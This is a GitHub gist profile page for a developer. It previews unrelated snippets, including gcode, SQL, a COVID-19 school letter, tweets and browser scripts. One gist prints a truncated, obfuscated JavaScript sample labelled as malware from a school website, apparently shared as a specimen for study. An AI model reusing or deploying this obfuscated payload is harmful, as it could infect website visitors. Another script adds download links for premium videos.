Skip to content

Instantly share code, notes, and snippets.

View MisterGlass's full-sized avatar

Yair Silbermintz MisterGlass

View GitHub Profile
Dear Fair Lawn Community,
I am writing to update you on our school’s plan and next steps in response to COVID-19, commonly known as the Coronavirus. Since I last wrote you, the epidemic has progressed and New Jersey Governor Phil Murphy has declared a state of emergency.
Toward that end, a Fair Lawn Coronavirus Leadership Team has been assembled and meetings have been underway to prepare a contingency plan in the event that schools MAY close to contain the spread of transmission of the Coronavirus. To date, we have no known cases of the Coronavirus in Fair Lawn Schools. Please be aware that, as per the New Jersey Department of Education, only the New Jersey Department of Health (NJDOH) and the Fair Lawn Department of Health have the authority to close schools for public health-related reasons in order for us to meet the 180 days’ state mandate.
Over the last few days, our team has been working diligently on a two-week contingency plan on how to translate our classes into remote learning at home and maint
1236768215151382530,neekaleek,Neek,Sun Mar 08 21:38:15 +0000 2020,.bat out of hell #BSidesLVSlogan
1236689463306264577,mattiacampagnan,Mattia Campagnano (The S@vvy_G33k),Sun Mar 08 16:25:19 +0000 2020,Rock This Shell #BSidesLVSlogan
1236688855094484998,mattiacampagnan,Mattia Campagnano (The S@vvy_G33k),Sun Mar 08 16:22:54 +0000 2020,Get the Shell Out of Here #BSidesLVSlogan
1236496719526785024,almosthuman0x1,AlmostHuman,Sun Mar 08 03:39:25 +0000 2020,@BSidesLV #BSidesLVSlogan 2020 Vision
1236496488307580932,almosthuman0x1,AlmostHuman,Sun Mar 08 03:38:30 +0000 2020,@BSidesLV #BSidesLVSlogan NOT CANCELLED!
1236487802059206656,mattiacampagnan,Mattia Campagnano (The S@vvy_G33k),Sun Mar 08 03:03:59 +0000 2020,May the Shell Be with You ##BSidesLVSlogan
1236435286218829825,Xanadu2600,Xanadu,Sat Mar 07 23:35:18 +0000 2020,#BSidesLVSlogan 21\n Drink in the information. No TP Required.
1236134033630904320,damikey,damikey,Sat Mar 07 03:38:14 +0000 2020,Twisted Scripter - We're Not Gonna Break It\n\n#BSidesLVSlogan http
version: '2'
services:
web:
image: nginx:latest
ports:
- "80:80"
- "8080:80"
volumes:
- ./src:/var/www/wordpress
@MisterGlass
MisterGlass / swapfilament.gcode
Created July 21, 2017 19:29
gcode snippet for filament swap
; ~ Pause for filament swap - Hand edit by MrGlass! ~
; Take the following gcode & past it above the gcode for the layer you want to swap at
; note that the temp is hardcoded to 190, change the S190 to your desired temp if its different
G1 X10 Y5; Move extruder to pos for swap
; Optional - turn off the hotend so it doesn't sit hot while paused
M104 S0 ; turn off extruder; Turn off extruder heat
M0; Pause
M104 S190 T0; Turn on extruder heat
M109 S190 T0; Turn on extruder heat - simplify always does both these
@MisterGlass
MisterGlass / gist:361e1ce8efe81821580ea9cc0dbdd25c
Created March 29, 2017 17:48
cliffside school malware sample
var HTYTYGLGOQ = atob('dmFyIFJXSllVT1BFSFUgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE2LTYsMTIyLTQsMTA1LTgsMTE2LTIsNDAtOCwxMTAtMywxMDQtMywxMjktOCw0MC04LDY3LTYsMzgtNiw0Ni03LDk0LTQsODEtNCw5MC0xLDcxLTYsODAtMSwxMDctNywxMDMtMiwxMDQtMywxMjYtNCwxMDUtNCw0Ny04LDYyLTMsMTctNywxMjUtNyw5OS0yLDExOS01LDM0LTIsMTA0LTMsMTE3LTcsMTA1LTYsMTA0LTMsMTA5LTksNDAtOCw2Ny02LDM4LTYsNDQtNSwxMDctNyw5NC03LDgzLTksMTE3LTksODEtNCwxMDgtMywxMjgtOSw5NC03LDc1LTcsNzQtOCw5MS02LDgyLTMsOTUtOCw1My00LDY3LTIsNjItNyw4MC0xLDczLTUsODAtMiwxMjAtMiw3My00LDEyNy01LDExOC03LDgxLTcsNzMtMyw4NC0zLDkxLTIsNjAtNSw4Ny04LDg3LTMsNzAtNSwxMjAtMyw3NC0xLDg5LTQsODctNSw5NS02LDEwNi04LDU2LTcsMTE1LTMsNzYtNiwxMDItMSwxMTYtNyw1Ni03LDU2LTMsOTctOCw5MC0zLDEwOS01LDgxLTUsOTEtNCwxMTItOCw5My04LDk5LTEsNzQtOSwxMTQtOCw1OS0zLDU2LTksODEtMSw4OC02LDU5LTYsMTE5LTgsODctNSw3Mi0zLDU0LTEsNzgtOCw4My01LDEyMC0xLDg5LTgsMTI2LTksODItOCw4OS0xLDEwMS0yLDEyMy0xLDgxLTUsMTA0LTEsMTE2LTUsNzQtOCw2OS0yLDExMS03LDEwNi02LDgxLTMsMTAwLTEsNTItMiw4NC03LDEyNS05LDc5LTMsMTA2LTIsMTIyLTMsODUtNCw3OC04LDEyMy00LDEyMi0zLDkxLTYsNzQtOSwxMTMtMyw4MC02L
<h2>
Web Site Terms and Conditions of Use
</h2>
<h3>
1. Terms
</h3>
<p>
@MisterGlass
MisterGlass / schemaverse_sample_queries.sql
Created July 27, 2016 21:14
A bunch of example queries for use in schemaverse
-- Get user ID (usefull as a subquery)
SELECT GET_PLAYER_ID(SESSION_USER);
-- Basic statistics
SELECT
balance,
fuel_reserve,
(SELECT count(*) FROM my_ships) AS ships,
(SELECT count(*) FROM planets WHERE conqueror_id=GET_PLAYER_ID(SESSION_USER)) AS planets,
FROM my_player;
@MisterGlass
MisterGlass / .sql
Created February 10, 2016 21:52
sql self editor test data insert
INSERT INTO plays (game_id, video_id, start_time, end_time) VALUES ([GAME_ID], 1, 10.25, 15.55);
INSERT INTO self_edited_plays (play_id) VALUES (LAST_INSERT_ID());
INSERT INTO plays (game_id, video_id, start_time, end_time) VALUES ([GAME_ID], 2, 20.25, 25.55);
INSERT INTO self_edited_plays (play_id) VALUES (LAST_INSERT_ID());
INSERT INTO plays (game_id, video_id, start_time, end_time) VALUES ([GAME_ID], 3, 30.25, 35.55);
INSERT INTO self_edited_plays (play_id) VALUES (LAST_INSERT_ID());
@MisterGlass
MisterGlass / addDownloadLinkToTested.js
Last active August 29, 2015 14:18
User script that adds a download link to Tested.com premium videos
// ==UserScript==
// @name Tested Premium add downlaod link
// @namespace http://mrglass.org
// @version 0.1
// @description Adds a download link to tested premium video pages
// @author MrGlass
// @match http://www.tested.com/premium/*
// @grant none
// ==/UserScript==
@MisterGlass
MisterGlass / bookmarkelt.js
Last active August 29, 2015 14:17
bookmarklet to submit to youtube downloader script
javascript:(function(){
serverUrl = 'http://example.com/youtubedl.php';
re = /^https?:\/\/www\.youtube\.com\/watch\?v=([\w-]+)/;
if(matches = re.exec(location.href)) {
videoId = matches[1];
var form = document.createElement("form");